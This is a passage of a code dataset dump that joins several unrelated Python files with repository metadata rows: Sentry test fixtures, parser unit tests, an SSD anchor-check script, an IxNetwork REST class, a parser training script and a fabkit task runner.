kwargs.setdefault('data', copy.deepcopy(DEFAULT_EVENT_DATA))
kwargs.setdefault('platform', kwargs['data'].get('platform', 'python'))
kwargs.setdefault('message', kwargs['data'].get('message', 'message'))
if kwargs.get('tags'):
tags = kwargs.pop('tags')
if isinstance(tags, dict):
tags = list(tags.items())
kwargs['data']['tags'] = tags
if kwargs.get('stacktrace'):
stacktrace = kwargs.pop('stacktrace')
kwargs['data']['stacktrace'] = stacktrace
kwargs['data'].setdefault(
'errors', [{
'type': EventError.INVALID_DATA,
'name': 'foobar',
}]
)
# maintain simple event fixtures by supporting the legacy message
# parameter just like our API would
if 'logentry' not in kwargs['data']:
kwargs['data']['logentry'] = {
'message': kwargs.get('message') or '<unlabeled event>',
}
if 'type' not in kwargs['data']:
kwargs['data'].update(
{
'type': 'default',
'metadata': {
'title': kwargs['data']['logentry']['message'],
},
}
)
kwargs['data'] = CanonicalKeyDict(kwargs.pop('data'))
event = Event(event_id=event_id, **kwargs)
EventMapping.objects.create(
project_id=event.project.id,
event_id=event_id,
group=event.group,
)
# emulate EventManager refs
event.data.bind_ref(event)
event.save()
return event
def create_full_event(self, event_id='a', **kwargs):
payload = """
{
"id": "f5dd88e612bc406ba89dfebd09120769",
"project": 11276,
"release": "e1b5d1900526feaf20fe2bc9cad83d392136030a",
"platform": "javascript",
"culprit": "app/components/events/eventEntries in map",
"message": "TypeError: Cannot read property '1' of null",
"tags": [
["environment", "prod"],
["sentry_version", "e1b5d1900526feaf20fe2bc9cad83d392136030a"],
["level", "error"],
["logger", "javascript"],
["sentry:release", "e1b5d1900526feaf20fe2bc9cad83d392136030a"],
["browser", "Chrome 48.0"],
["device", "Other"],
["os", "Windows 10"],
["url", "https://sentry.io/katon-direct/localhost/issues/112734598/"],
["sentry:user", "id:41656"]
],
"errors": [{
"url": "<anonymous>",
"type": "js_no_source"
}],
"extra": {
"session:duration": 40364
},
"exception": {
"exc_omitted": null,
"values": [{
"stacktrace": {
"frames": [{
"function": "batchedUpdates",
"abs_path": "webpack:////usr/src/getsentry/src/sentry/~/react/lib/ReactUpdates.js",
"pre_context": [" // verify that that's the case. (This is called by each top-level update", " // function, like setProps, setState, forceUpdate, etc.; creation and", " // destruction of top-level components is guarded in ReactMount.)", "", " if (!batchingStrategy.isBatchingUpdates) {"],
"post_context": [" return;", " }", "", " dirtyComponents.push(component);", "}"],
"filename": "~/react/lib/ReactUpdates.js",
"module": "react/lib/ReactUpdates",
"colno": 0,
"in_app": false,
"data": {
"orig_filename": "/_static/29e365f8b0d923bc123e8afa38d890c3/sentry/dist/vendor.js",
"orig_abs_path": "https://media.sentry.io/_static/29e365f8b0d923bc123e8afa38d890c3/sentry/dist/vendor.js",
"sourcemap": "https://media.sentry.io/_static/29e365f8b0d923bc123e8afa38d890c3/sentry/dist/vendor.js.map",
"orig_lineno": 37,
"orig_function": "Object.s [as enqueueUpdate]",
"orig_colno": 16101
},
"context_line": " batchingStrategy.batchedUpdates(enqueueUpdate, component);",
"lineno": 176
}],
"frames_omitted": null
},
"type": "TypeError",
"value": "Cannot read property '1' of null",
"module": null
}]
},
"request": {
"url": "https://sentry.io/katon-direct/localhost/issues/112734598/",
"headers": [
["Referer", "https://sentry.io/welcome/"],
["User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"]
]
},
"user": {
"ip_address": "0.0.0.0",
"id": "41656",
"email": "test@example.com"
},
"version": "7",
"breadcrumbs": {
"values": [
{
"category": "xhr",
"timestamp": 1496395011.63,
"type": "http",
"data": {
"url": "/api/path/here",
"status_code": "500",
"method": "POST"
}
}
]
}
}"""
return self.create_event(event_id=event_id, platform='javascript',
data=json.loads(payload))
def create_group(self, project=None, checksum=None, **kwargs):
if checksum:
warnings.warn('Checksum passed to create_group', DeprecationWarning)
if project is None:
project = self.project
kwargs.setdefault('message', 'Hello world')
kwargs.setdefault('data', {})
if 'type' not in kwargs['data']:
kwargs['data'].update(
{
'type': 'default',
'metadata': {
'title': kwargs['message'],
},
}
)
if 'short_id' not in kwargs:
kwargs['short_id'] = project.next_short_id()
return Group.objects.create(project=project, **kwargs)
def create_file(self, **kwargs):
return File.objects.create(**kwargs)
def create_file_from_path(self, path, name=None, **kwargs):
if name is None:
name = os.path.basename(path)
file = self.create_file(name=name, **kwargs)
with open(path) as f:
file.putfile(f)
return file
def create_event_attachment(self, event=None, file=None, **kwargs):
if event is None:
event = self.event
if file is None:
file = self.create_file(
name='log.txt',
size=32,
headers={'Content-Type': 'text/plain'},
checksum='dc1e3f3e411979d336c3057cce64294f3420f93a',
)
return EventAttachment.objects.create(
project_id=event.project_id,
group_id=event.group_id,
event_id=event.event_id,
file=file,
**kwargs
)
def create_dif_file(self, debug_id=None, project=None, object_name=None,
features=None, data=None, file=None, cpu_name=None, **kwargs):
if project is None:
project = self.project
if debug_id is None:
debug_id = six.text_type(uuid4())
if object_name is None:
object_name = '%s.dSYM' % debug_id
if features is not None:
if data is None:
data = {}
data['features'] = features
if file is None:
file = self.create_file(
name=object_name,
size=42,
headers={'Content-Type': 'application/x-mach-binary'},
checksum='dc1e3f3e411979d336c3057cce64294f3420f93a',
)
return ProjectDebugFile.objects.create(
debug_id=debug_id,
project=project,
object_name=object_name,
cpu_name=cpu_name or 'x86_64',
file=file,
data=data,
**kwargs
)
return ProjectDebugFile.objects.create(project=project, **kwargs)
def create_dif_from_path(self, path, object_name=None, **kwargs):
if object_name is None:
object_name = os.path.basename(path)
headers = {'Content-Type': 'application/x-mach-binary'}
file = self.create_file_from_path(path, name=object_name, headers=headers)
return self.create_dif_file(file=file, object_name=object_name, **kwargs)
def add_user_permission(self, user, permission):
try:
with transaction.atomic():
UserPermission.objects.create(user=user, permission=permission)
except IntegrityError:
raise
def create_sentry_app(self, name=None, organization=None, published=False, scopes=(),
webhook_url=None, **kwargs):
if not name:
name = 'Test App'
if not organization:
organization = self.create_organization()
if not webhook_url:
webhook_url = 'https://example.com/webhook'
app = SentryAppCreator.run(
name=name,
organization=organization,
scopes=scopes,
webhook_url=webhook_url,
**kwargs
)
if published:
app.update(status=SentryAppStatus.PUBLISHED)
return app
def create_service_hook(self, actor=None, project=None, events=None, url=None, **kwargs):
if not actor:
actor = self.create_user()
if not project:
org = self.create_organization(owner=actor)
project = self.create_project(organization=org)
if not events:
events = ('event.created',)
if not url:
url = 'https://example/sentry/webhook'
return ServiceHookCreator.run(
actor=actor,
project=project,
events=events,
url=url,
**kwargs
)
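# Illustrative usage (not part of the original file): Fixtures is written as a mixin, so a
# hypothetical test case can combine the lazy `fixture` attributes with the create_* helpers;
# the base test class below is assumed, not prescribed by this module.
#     class ReleaseCommitTest(Fixtures, SomeTestCase):
#         def test_release_records_commit(self):
#             release = self.create_release(project=self.project, user=self.user)
#             assert release.commit_count == 1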
| 35.683646
| 324
| 0.502254
|
85f6043b210fe316644b8a71ab52d2f73bd2aa5a
| 3,657
|
py
|
Python
|
tests/test_parser.py
|
genejiang2012/iTest_httpapi_v2
|
5edfff2e068ce9b031a9c990c1bfcbfca25469d5
|
[
"MIT"
] | null | null | null |
tests/test_parser.py
|
genejiang2012/iTest_httpapi_v2
|
5edfff2e068ce9b031a9c990c1bfcbfca25469d5
|
[
"MIT"
] | null | null | null |
tests/test_parser.py
|
genejiang2012/iTest_httpapi_v2
|
5edfff2e068ce9b031a9c990c1bfcbfca25469d5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2021/1/6 19:29
# @Author : Gene Jiang
# @File    : test_parser.py
# @Description:
import pytest
from httpapi import parser
from loguru import logger
def test_parse_string_value():
assert parser.parse_string_value("123") == 123
assert parser.parse_string_value("12.2") == 12.2
assert parser.parse_string_value("abc") == "abc"
assert parser.parse_string_value("$var") == "$var"
def test_extract_variables():
assert parser.extract_variables("$var") == {"var"}
assert parser.extract_variables("$var123") == {"var123"}
assert parser.extract_variables("$var_name") == {"var_name"}
assert parser.extract_variables("var") == set()
assert parser.extract_variables("a$var") == {"var"}
assert parser.extract_variables("$v ar") == {"v"}
assert parser.extract_variables(" ") == set()
assert parser.extract_variables("$abc*") == {"abc"}
assert parser.extract_variables("${func()}") == set()
assert parser.extract_variables("${func(1,2)}") == set()
assert parser.extract_variables("${gen_md5($TOKEN, $data, $random)}") == {
"TOKEN", "data", "random"}
assert parser.extract_variables("Z:2>1*0*1+1$$1") == set()
def test_parse_data():
variables_mapping = {
"var_1": "abc",
"var_2": "def",
"var_3": 123,
"var_4": {"a": 1},
"var_5": True,
"var_6": None
}
assert parser.parse_data("$var_1", variables_mapping) == "abc"
assert parser.parse_data("${var_1}", variables_mapping) == "abc"
assert parser.parse_data("var_1", variables_mapping) == "var_1"
assert parser.parse_data("$var_1#XYZ", variables_mapping) == "abc#XYZ"
assert parser.parse_data("${var_1}#XYZ", variables_mapping) == "abc#XYZ"
assert parser.parse_data("/$var_1/$var_2/var3",
variables_mapping) == "/abc/def/var3"
assert parser.parse_data("$var_3", variables_mapping) == 123
assert parser.parse_data("$var_4", variables_mapping) == {"a": 1}
assert parser.parse_data("$var_5", variables_mapping) == True
assert parser.parse_data("abc$var_5", variables_mapping) == 'abcTrue'
assert parser.parse_data("abc$var_4", variables_mapping) == "abc{'a': 1}"
assert parser.parse_data("$var_6", variables_mapping) == None
assert parser.parse_data("/api/$var_1", variables_mapping) == "/api/abc"
assert parser.parse_data(["$var_1", "$var_2"], variables_mapping) == ["abc",
"def"]
assert parser.parse_data({"$var_1": "$var_2"}, variables_mapping) == {"abc":
"def"}
assert parser.parse_data("ABC$var_1", variables_mapping) == "ABCabc"
assert parser.parse_data("ABC${var_1}", variables_mapping) == "ABCabc"
assert parser.parse_data("ABC${var_1}/123${var_1}/456",
variables_mapping) == "ABCabc/123abc/456"
assert parser.parse_data("func1(${var_1}, ${var_3})",
variables_mapping) == "func1(abc, 123)"
def test_parse_string():
assert parser.parse_string("abc${add_one($num}def", {"num": 3},
{"add_one": lambda x: x + 1}) == "abc4def"
def test_parse_variable_mapping():
variables = {"varA": "$varB", "varB": "$varC", "varC": "123", "a": 1,
"b": 2}
parsed_variable = parser.parse_variable_mapping(variables)
logger.info(f"The parsed value is {parsed_variable}")
assert parsed_variable["varA"] == "123"
assert parsed_variable["varB"] == "123"
| 43.535714
| 84
| 0.604047
|
19b41eb32f2547b422f2cdf98e7d14d99eb88593
| 7,060
|
py
|
Python
|
testcodes/check_encoding.py
|
Intel-tensorflow/SSD_tensorflow_VOC
|
839c4291926e4c9f2cf5e028d666766daa873b7c
|
[
"Apache-2.0"
] | 70
|
2017-04-27T03:42:18.000Z
|
2022-02-19T06:55:48.000Z
|
testcodes/check_encoding.py
|
Intel-tensorflow/SSD_tensorflow_VOC
|
839c4291926e4c9f2cf5e028d666766daa873b7c
|
[
"Apache-2.0"
] | 33
|
2017-04-26T01:48:40.000Z
|
2021-06-11T02:21:34.000Z
|
testcodes/check_encoding.py
|
Intel-tensorflow/SSD_tensorflow_VOC
|
839c4291926e4c9f2cf5e028d666766daa873b7c
|
[
"Apache-2.0"
] | 32
|
2017-07-13T12:58:04.000Z
|
2021-05-17T08:41:46.000Z
|
from datasets import pascalvoc_datasets
import tensorflow as tf
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
# from nets import nets_factory
from preprocessing import preprocessing_factory
import numpy as np
import cv2
from utility import visualization
from nets.ssd import g_ssd_model
from preprocessing.ssd_vgg_preprocessing import np_image_unwhitened
from preprocessing.ssd_vgg_preprocessing import preprocess_for_train
from preprocessing.ssd_vgg_preprocessing import preprocess_for_eval
import tf_utils
import math
class CheckEncoding(object):
def __init__(self):
self.batch_size = 32
return
def __preprocess_data(self, image, labels, bboxes):
out_shape = g_ssd_model.img_shape
if self.is_training_data:
image, labels, bboxes = preprocess_for_train(image, labels, bboxes, out_shape = out_shape)
else:
image, labels, bboxes, _ = preprocess_for_eval(image, labels, bboxes, out_shape = out_shape)
return image, labels, bboxes
def __get_images_labels_bboxes(self,data_sources, num_samples,is_training_data):
self.dataset = pascalvoc_datasets.get_dataset_info(data_sources, num_samples)
self.is_training_data = is_training_data
if self.is_training_data:
shuffle = True
#make sure most samples can be fetched in one epoch
self.num_readers = 2
else:
            # make sure data is fetched in sequence
shuffle = False
self.num_readers = 1
provider = slim.dataset_data_provider.DatasetDataProvider(
self.dataset,
shuffle=shuffle,
num_readers=self.num_readers,
common_queue_capacity=30 * self.batch_size,
common_queue_min=10 * self.batch_size)
# Get for SSD network: image, labels, bboxes.
[image, shape, format, self.filename, glabels, gbboxes,gdifficults] = provider.get(['image', 'shape', 'format','filename',
'object/label',
'object/bbox',
'object/difficult'])
# Pre-processing image, labels and bboxes.
self.image, self.glabels, self.gbboxes = self.__preprocess_data(image, glabels, gbboxes)
# anchors_1 = g_ssd_model.get_allanchors(minmaxformat=False)
anchors = g_ssd_model.get_allanchors(minmaxformat=True)
print(anchors[-1][-4:])
        # flatten the anchors
temp_anchors = []
for i in range(len(anchors)):
temp_anchors.append(tf.reshape(anchors[i], [-1, 4]))
anchors = tf.concat(temp_anchors, axis=0)
self.jaccard = g_ssd_model.compute_jaccard(self.gbboxes, anchors)
# Assign groundtruth information for all default/anchor boxes
# gclasses, glocalisations, gscores = g_ssd_model.tf_ssd_bboxes_encode(glabels, gbboxes)
return
def __disp_image(self, img, classes, bboxes):
bvalid = (classes !=0)
classes = classes[bvalid]
bboxes = bboxes[bvalid]
scores =np.full(classes.shape, 1.0)
visualization.plt_bboxes(img, classes, scores, bboxes,title='Ground Truth')
return
def __disp_matched_anchors(self,img, target_labels_data, target_localizations_data, target_scores_data):
found_matched = False
all_anchors = g_ssd_model.get_allanchors()
for i, target_score_data in enumerate(target_scores_data):
num_pos = (target_score_data > 0.5).sum()
if (num_pos == 0):
continue
print('Found {} matched default boxes in layer {}'.format(num_pos,g_ssd_model.feat_layers[i]))
pos_sample_inds = (target_score_data > 0.5).nonzero()
pos_sample_inds = [pos_sample_inds[0],pos_sample_inds[1],pos_sample_inds[2]]
classes = target_labels_data[i][pos_sample_inds]
scores = target_scores_data[i][pos_sample_inds]
bboxes_default= g_ssd_model.get_allanchors(minmaxformat=True)[i][pos_sample_inds]
bboxes_gt = g_ssd_model.decode_bboxes_layer(target_localizations_data[i][pos_sample_inds],
all_anchors[i][pos_sample_inds])
print("default box minimum, {} gt box minimum, {}".format(bboxes_default.min(), bboxes_gt.min()))
marks_default = np.full(classes.shape, True)
marks_gt = np.full(classes.shape, False)
scores_gt = np.full(scores.shape, 1.0)
bboxes = bboxes_default
neg_marks = marks_default
add_gt = True
if add_gt :
bboxes = np.vstack([bboxes_default,bboxes_gt])
neg_marks = np.hstack([marks_default,marks_gt])
classes = np.tile(classes, 2)
scores = np.hstack([scores, scores_gt])
title = "Default boxes: Layer {}".format(g_ssd_model.feat_layers[i])
visualization.plt_bboxes(img, classes, scores, bboxes,neg_marks=neg_marks,title=title)
found_matched = True
return found_matched
def get_voc_2007_test_data(self):
data_sources = "../../data/voc/tfrecords/voc_test_2007*.tfrecord"
num_samples = pascalvoc_datasets.DATASET_SIZE['2007_test']
return self.__get_images_labels_bboxes(data_sources, num_samples, False)
def run(self):
with tf.Graph().as_default():
self.get_voc_2007_test_data()
with tf.Session('') as sess:
init = tf.global_variables_initializer()
sess.run(init)
with slim.queues.QueueRunners(sess):
image, glabels, gbboxes,filename,jaccard= sess.run([self.image, self.glabels, self.gbboxes,self.filename,self.jaccard])
print(filename)
print(glabels)
print(gbboxes)
print(jaccard)
                    # select the first image in the batch
image_data = np_image_unwhitened(image)
self.__disp_image(image_data, glabels, gbboxes)
# found_matched = self.__disp_matched_anchors(image_data,target_labels_data, target_localizations_data, target_scores_data)
plt.show()
return
if __name__ == "__main__":
obj= CheckEncoding()
obj.run()
| 39.222222
| 167
| 0.581586
|
8f6b46fa12249e3c73350c1756f92cbce7eda900
| 8,828
|
py
|
Python
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/trafficitem/applibprofile/applibflow/applibflow.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 20
|
2019-05-07T01:59:14.000Z
|
2022-02-11T05:24:47.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/trafficitem/applibprofile/applibflow/applibflow.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 60
|
2019-04-03T18:59:35.000Z
|
2022-02-22T12:05:05.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/trafficitem/applibprofile/applibflow/applibflow.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 13
|
2019-05-20T10:48:31.000Z
|
2021-10-06T07:45:44.000Z
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class AppLibFlow(Base):
"""This object specifies the particular application library flow related properties.
The AppLibFlow class encapsulates a list of appLibFlow resources that are managed by the system.
A list of resources can be retrieved from the server using the AppLibFlow.find() method.
"""
__slots__ = ()
_SDM_NAME = 'appLibFlow'
_SDM_ATT_MAP = {
'ConfigId': 'configId',
'ConnectionCount': 'connectionCount',
'Description': 'description',
'FlowId': 'flowId',
'FlowSize': 'flowSize',
'Name': 'name',
'Parameters': 'parameters',
'Percentage': 'percentage',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(AppLibFlow, self).__init__(parent, list_op)
@property
def Connection(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.connection.connection.Connection): An instance of the Connection class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.connection.connection import Connection
if self._properties.get('Connection', None) is not None:
return self._properties.get('Connection')
else:
return Connection(self)
@property
def Parameter(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.parameter.parameter.Parameter): An instance of the Parameter class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.traffic.trafficitem.applibprofile.applibflow.parameter.parameter import Parameter
if self._properties.get('Parameter', None) is not None:
return self._properties.get('Parameter')
else:
return Parameter(self)
@property
def ConfigId(self):
# type: () -> int
"""
Returns
-------
        - number: The internal config id associated with this flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConfigId'])
@property
def ConnectionCount(self):
# type: () -> int
"""
Returns
-------
- number: Number of connections in this flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectionCount'])
@property
def Description(self):
# type: () -> str
"""
Returns
-------
- str: Brief description of what the flow does.
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def FlowId(self):
# type: () -> str
"""
Returns
-------
- str: The identifier of the flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['FlowId'])
@property
def FlowSize(self):
# type: () -> int
"""
Returns
-------
- number: The size of the flow in bytes.
"""
return self._get_attribute(self._SDM_ATT_MAP['FlowSize'])
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: the name of the Flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@property
def Parameters(self):
# type: () -> List[str]
"""
Returns
-------
- list(str): Array containing configurable parameters per flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['Parameters'])
@property
def Percentage(self):
# type: () -> int
"""
Returns
-------
        - number: The amount of traffic generated for this flow.
"""
return self._get_attribute(self._SDM_ATT_MAP['Percentage'])
@Percentage.setter
def Percentage(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Percentage'], value)
def update(self, Percentage=None):
# type: (int) -> AppLibFlow
"""Updates appLibFlow resource on the server.
Args
----
        - Percentage (number): The amount of traffic generated for this flow.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, Percentage=None):
# type: (int) -> AppLibFlow
"""Adds a new appLibFlow resource on the json, only valid with config assistant
Args
----
        - Percentage (number): The amount of traffic generated for this flow.
Returns
-------
- self: This instance with all currently retrieved appLibFlow resources using find and the newly added appLibFlow resources available through an iterator or index
Raises
------
- Exception: if this function is not being used with config assistance
"""
return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, ConfigId=None, ConnectionCount=None, Description=None, FlowId=None, FlowSize=None, Name=None, Parameters=None, Percentage=None):
# type: (int, int, str, str, int, str, List[str], int) -> AppLibFlow
"""Finds and retrieves appLibFlow resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve appLibFlow resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all appLibFlow resources from the server.
Args
----
        - ConfigId (number): The internal config id associated with this flow.
- ConnectionCount (number): Number of connections in this flow.
- Description (str): Brief description of what the flow does.
- FlowId (str): The identifier of the flow.
- FlowSize (number): The size of the flow in bytes.
- Name (str): the name of the Flow.
- Parameters (list(str)): Array containing configurable parameters per flow.
        - Percentage (number): The amount of traffic generated for this flow.
Returns
-------
- self: This instance with matching appLibFlow resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of appLibFlow data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the appLibFlow resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
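# Illustrative usage sketch (not part of the generated SDM class above). It
# assumes an already connected ixnetwork_restpy session and an AppLibProfile
# parent object; the variable and flow names below are hypothetical.
def _example_rebalance_flow(app_lib_profile, flow_name, percentage):
    """Find a flow by name under the given AppLibProfile and update its Percentage."""
    # find() filters server-side with regex, so anchor the name for an exact match.
    flows = app_lib_profile.AppLibFlow.find(Name='^%s$' % flow_name)
    for flow in flows:
        # Percentage is the only writable attribute exposed by this class.
        flow.update(Percentage=percentage)
    return flows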
| 35.740891
| 178
| 0.63763
|
ebaab48b55047f50262ec3ded87c7486a1fd5ca2
| 1,406
|
py
|
Python
|
test/script/train_embedding_psd_id.py
|
emorynlp/bert-2018
|
228b2046d92084ea3cd7c900c1d8af1f0a925cfe
|
[
"Apache-2.0"
] | 17
|
2019-08-15T01:49:10.000Z
|
2022-03-28T19:12:04.000Z
|
test/script/train_embedding_psd_id.py
|
emorynlp/bert-2018
|
228b2046d92084ea3cd7c900c1d8af1f0a925cfe
|
[
"Apache-2.0"
] | 2
|
2020-09-09T02:30:23.000Z
|
2022-03-28T19:57:21.000Z
|
test/script/train_embedding_psd_id.py
|
emorynlp/bert-2018
|
228b2046d92084ea3cd7c900c1d8af1f0a925cfe
|
[
"Apache-2.0"
] | 1
|
2020-03-12T03:41:13.000Z
|
2020-03-12T03:41:13.000Z
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from bertsota.parser.dep_parser import SDPParser
if __name__ == '__main__':
save_dir = 'data/model/train-embedding-psd-id'
parser = SDPParser()
parser.train(train_file='data/semeval15/en.psd.conllu',
dev_file='data/semeval15/en.id.psd.conllu',
test_file='data/semeval15/en.id.psd.conllu',
save_dir=save_dir,
pretrained_embeddings_file='data/embedding/glove.6B.100d.txt')
parser.load(save_dir)
parser.evaluate(test_file='data/semeval15/en.id.psd.conllu', save_dir=save_dir,
num_buckets_test=10)
| 42.606061
| 83
| 0.720484
|
a7df44e1e30700bec201dcf9d8da87ea93513b02
| 12,665
|
py
|
Python
|
core/setup/base.py
|
fabrickit/fabkit
|
ca099c7e543efb8f5c1d19453c8ceada0584e563
|
[
"MIT"
] | null | null | null |
core/setup/base.py
|
fabrickit/fabkit
|
ca099c7e543efb8f5c1d19453c8ceada0584e563
|
[
"MIT"
] | null | null | null |
core/setup/base.py
|
fabrickit/fabkit
|
ca099c7e543efb8f5c1d19453c8ceada0584e563
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from fabkit import env, api, status, log, util
import re
from types import DictType
import inspect
from oslo_config import cfg
CONF = cfg.CONF
@api.task
def manage(*args, **kwargs):
run_func(args, *args, **kwargs)
@api.task
def check(*args, **kwargs):
run_func(['^check.*'], *args, **kwargs)
@api.task
def setup(*args, **kwargs):
run_func(['^setup.*'], *args, **kwargs)
def run_func(func_names=[], *args, **kwargs):
fabrun_filter = []
is_filter = False
env.is_test = False
env.is_help = False
if len(args) > 0:
if args[0] == 'test':
env.is_test = True
args = args[1:]
elif args[0] == 'help':
env.is_help = True
args = args[1:]
if 'f' in kwargs:
fabrun_filter = kwargs['f'].split('+')
fabrun_filter = [re.compile(f) for f in fabrun_filter]
is_filter = True
func_patterns = [re.compile(name) for name in func_names]
host_filter = {}
for run in env.runs:
cluster_name = run['cluster']
cluster = env.cluster_map[run['cluster']]
env.cluster = cluster
log.init_logger(cluster_name)
for cluster_run in run['runs']:
run_results = []
script_name = cluster_run['fabscript']
if is_filter:
for f in fabrun_filter:
if f.search(script_name):
break
else:
continue
if env.is_check or env.is_manage:
                # Prevent running the same fabscript twice on a host
hosts = host_filter.get(script_name, [])
tmp_hosts = list(set(cluster_run['hosts']) - set(hosts))
cluster_run['hosts'] = tmp_hosts
hosts.extend(tmp_hosts)
host_filter[script_name] = hosts
if len(cluster_run['hosts']) == 0:
continue
hosts = []
for host in cluster_run['hosts']:
env.node_map[host] = env.node_map.get(host, {
'host': host,
'bootstrap_status': -1,
})
if env.node_map[host]['bootstrap_status'] != status.FAILED_CHECK:
hosts.append(host)
env.script_name = script_name
env.hosts = hosts
# override env
override_env = env.cluster.get('env', {})
override_env.update(cluster_run.get('env', {}))
default_env = {}
for key, value in override_env.items():
default_env[key] = getattr(env, key, None)
setattr(env, key, value)
env.cluster_status = env.cluster['__status']
env.node_status_map = env.cluster_status['node_map']
env.fabscript_status_map = env.cluster_status['fabscript_map']
env.fabscript = env.fabscript_status_map[script_name]
log.info('hosts: {0}'.format(env.hosts))
log.info('run: {0}: {1}'.format(script_name, env.fabscript))
log.debug('node_status_map: {0}'.format(env.node_status_map))
# check require
require = env.cluster['fabscript_map'][script_name]['require']
if env.is_setup:
is_require = True
for script, status_code in require.items():
required_status = env.fabscript_status_map[script]['status']
if required_status != status_code:
log.error('Require Error\n'
+ '{0} is require {1}:{2}.\nbut {1} status is {3}.'.format(
script_name, script, status_code, required_status))
is_require = False
break
if not is_require:
break
script = '.'.join([CONF.fabscript_module, script_name.replace('/', '.')])
            # importlib is only available in Python 2.7 and later
# module = importlib.import_module(script)
module = __import__(script, globals(), locals(), ['*'], -1)
module_funcs = []
for member in inspect.getmembers(module):
if inspect.isfunction(member[1]):
module_funcs.append(member[0])
if env.is_help and len(func_patterns) == 0:
for candidate in module_funcs:
func = getattr(module, candidate)
print 'Task: {0}'.format(func.__name__)
print func.__doc__
continue
            # Run every task function that matches func_patterns
is_expected = False
is_contain_unexpected = False
for func_pattern in func_patterns:
for candidate in module_funcs:
if not func_pattern.match(candidate):
continue
func = getattr(module, candidate)
                    # Only run functions decorated with @task
if not hasattr(func, 'is_task') or not func.is_task:
continue
if env.is_help:
print 'Task: {0}'.format(func.__name__)
print func.__doc__
continue
results = api.execute(func, *args, **kwargs)
# check results
data_map = {}
tmp_status = None
is_contain_failed = False
for host, result in results.items():
env.node_map[host].update(result['node'])
if not result or type(result) is not DictType:
result = {}
node_result = env.node_status_map[host]['fabscript_map'][script_name]
result_status = result.get('status')
task_status = result.get('task_status', status.SUCCESS)
msg = result.get('msg')
if msg is None:
if task_status is status.SUCCESS:
msg = status.FABSCRIPT_SUCCESS_MSG
else:
msg = status.FABSCRIPT_FAILED_MSG
if func.is_bootstrap:
if task_status == status.FAILED_CHECK or \
task_status == status.FAILED_CHECK_PING:
env.node_map[host]['bootstrap_status'] = status.FAILED_CHECK
else:
